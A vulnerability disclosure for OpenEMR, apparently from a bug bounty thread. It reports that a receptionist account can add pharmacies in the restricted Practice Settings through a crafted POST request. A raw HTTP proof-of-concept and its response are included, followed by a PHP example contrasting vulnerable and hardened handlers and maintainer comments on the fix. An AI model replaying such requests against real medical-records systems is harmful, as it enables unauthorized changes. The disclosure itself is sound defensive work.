Broken Access Controls in Practice settings in openemr/openemr
Dec 26th 2022
We observed that a receptionist user can add a Pharmacy in the Practice Settings section, although this area is restricted to
Proof of Concept
POST /openemr/controller.php?practice_settings&pharmacy&action=edit
Host: demo.openemr.io
Cookie: OpenEMR=<receptionist user's cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/controller.php?practice_settings&pharmacy&action=edit

form_id=&name=test_pharmarcy&address_line1=11&address_line2=11&city=&state=&zip=&email=&phone=&fax=&npi=&ncpdp=&transmit_method=1&id=&process=true
302 Found
Server: nginx/1.21.1
Date: Mon, 26 Dec 2022 09:02:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /openemr/controller.php?practice_settings&pharmacy&action=list
Content-Length: 9246

<html> <head> <title>Practice Settings</title> <meta charset="utf-8" /> ...
After we send the request above, a new pharmacy is added.
This vulnerability allows a front desk user to add any pharmacy, which could break the logic of the application.
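The defect class in the report is a write handler that relies on the UI hiding the Practice Settings menu from receptionists instead of authorizing the POST itself. The following is an added example, not OpenEMR's own code or its actual fix: it places the vulnerable handler shape beside a hardened one that checks authorization first and fails closed. The ACL wrapper is an assumption; in OpenEMR it would delegate to the project's own access-control check.

```php
<?php
// Added example (not from OpenEMR). Vulnerable vs. hardened shape of the
// pharmacy "edit" action from the report. All names here are illustrative.
declare(strict_types=1);

// Vulnerable shape: no authorization check, so any authenticated session
// (e.g. a receptionist) that posts process=true creates a pharmacy.
function pharmacyEditVulnerable(array $post, callable $save): string
{
    if (($post['process'] ?? '') === 'true') {
        $save($post);                 // write happens for every session
        return 'redirect:list';
    }
    return 'render:form';
}

// Hardened shape: authorize before the form is parsed or rendered, for GET
// and POST alike, and deny by default.
// $aclCheck is an injected callable; in OpenEMR it would wrap the project's
// ACL check for the practice-settings section (assumed, not taken from the page).
function pharmacyEditHardened(array $post, callable $save, callable $aclCheck): string
{
    if ($aclCheck() !== true) {
        http_response_code(403);
        return 'deny';                // nothing is read from $post, nothing saved
    }
    if (($post['process'] ?? '') === 'true') {
        $save($post);
        return 'redirect:list';
    }
    return 'render:form';
}

// Constructed request body mirroring the PoC's form fields.
$postBody = ['form_id' => '', 'name' => 'test_pharmarcy', 'transmit_method' => '1', 'process' => 'true'];
$written = 0;
$save = function (array $p) use (&$written): void { $written++; };

// Receptionist session: the ACL wrapper answers "not permitted".
$receptionistAcl = fn(): bool => false;
$r1 = pharmacyEditVulnerable($postBody, $save);
$r2 = pharmacyEditHardened($postBody, $save, $receptionistAcl);
printf("vulnerable handler: %s, hardened handler: %s, pharmacies written: %d\n", $r1, $r2, $written);

// Admin session: the same request is allowed through the hardened handler.
$adminAcl = fn(): bool => true;
$r3 = pharmacyEditHardened($postBody, $save, $adminAcl);
printf("hardened handler (admin): %s, pharmacies written: %d\n", $r3, $written);
```

The point to carry into review of similar controllers is that the authorization decision has to sit in the handler that performs the write, since the hidden menu entry offers no protection against a hand-crafted request like the one in the PoC.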
This is fixed in the master branch at https://github.com/openemr/openemr/commit/bb4244c83a74628faafabc0598366f49863914a9
@Nhien.IT, @admin, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after the OpenEMR 7.0.1 release), we will then mark this issue as fixed (and publish at that time with a CVE).
thanks for the report @Nhien.IT !
Thanks for your effort, I hope to publish a fix version soon.
I have received mail about the 7.0.1 version being published. Any update here?